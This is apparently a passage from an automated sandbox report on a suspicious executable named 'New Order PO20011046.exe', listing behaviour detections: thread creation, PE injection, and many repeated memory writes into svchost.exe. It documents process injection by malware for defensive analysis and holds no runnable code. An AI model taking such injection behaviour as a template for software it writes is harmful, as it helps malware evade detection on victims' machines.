                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6B70000Jump to behavior
                    Injects a PE file into a foreign processesShow sources
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 50480000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Users\user\Desktop\New Order PO20011046.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regionsShow sources
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 180000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 190000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1A0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1F0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 440000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 450000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 460000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 470000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 480000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 490000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4A0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4B0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4C0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4D0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4E0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B10000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B20000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B30000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B40000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B50000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B60000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B70000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B80000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B90000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: BA0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: BB0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: BC0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: BD0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: BE0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: BF0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C00000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C10000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C20000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C30000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C40000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C50000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C60000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C70000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C80000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: C90000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: CA0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: CB0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: CC0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: CD0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: CE0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: CF0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D00000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D10000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D20000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D30000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D40000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D50000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D60000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D70000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D80000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: D90000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: DA0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: DB0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: DC0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: DD0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: DE0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: DF0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E00000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E10000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E20000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E30000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E40000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E50000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E60000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E70000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E80000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: E90000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: EA0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: EB0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: EC0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: ED0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: EE0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: EF0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F00000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F10000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F20000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F30000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F40000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F50000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F60000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F70000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F80000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: F90000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: FA0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: FB0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: FC0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: FD0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: FE0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: FF0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1000000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1010000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1020000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1030000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1040000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1050000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1060000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1070000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1080000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1090000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 10A0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 10B0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 10C0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 10D0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 10E0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 10F0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1100000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1110000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1120000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1130000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1140000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1150000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1160000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1170000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1180000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1190000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 11A0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 11B0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 11C0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 11D0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 11E0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 11F0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1200000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1210000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1220000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1230000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1240000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1250000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1260000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1270000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1280000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 1290000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 12A0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 12B0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 12C0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 12D0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 12E0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 12F0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3310000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3320000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3330000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3340000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3350000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3360000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3370000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3380000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3390000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 33A0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 33B0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 33C0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 33D0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 33E0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 33F0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3400000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3410000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3420000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3430000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3440000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3450000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3460000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3470000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3480000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3490000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 34A0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 34B0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 34C0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 34D0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 34E0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 34F0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3500000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3510000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3520000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3530000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3540000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3550000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3560000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3570000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3580000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 36D0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 36E0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 36F0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3700000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3710000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3720000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3730000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3740000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3750000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3760000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3770000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3780000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3790000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 37A0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 37B0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 37C0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 37D0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 37E0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 37F0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3840000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5110000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5120000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5130000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5140000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5150000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5160000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5170000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5180000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5190000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 51A0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 51B0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 51C0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 51D0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 51E0000Jump to behavior
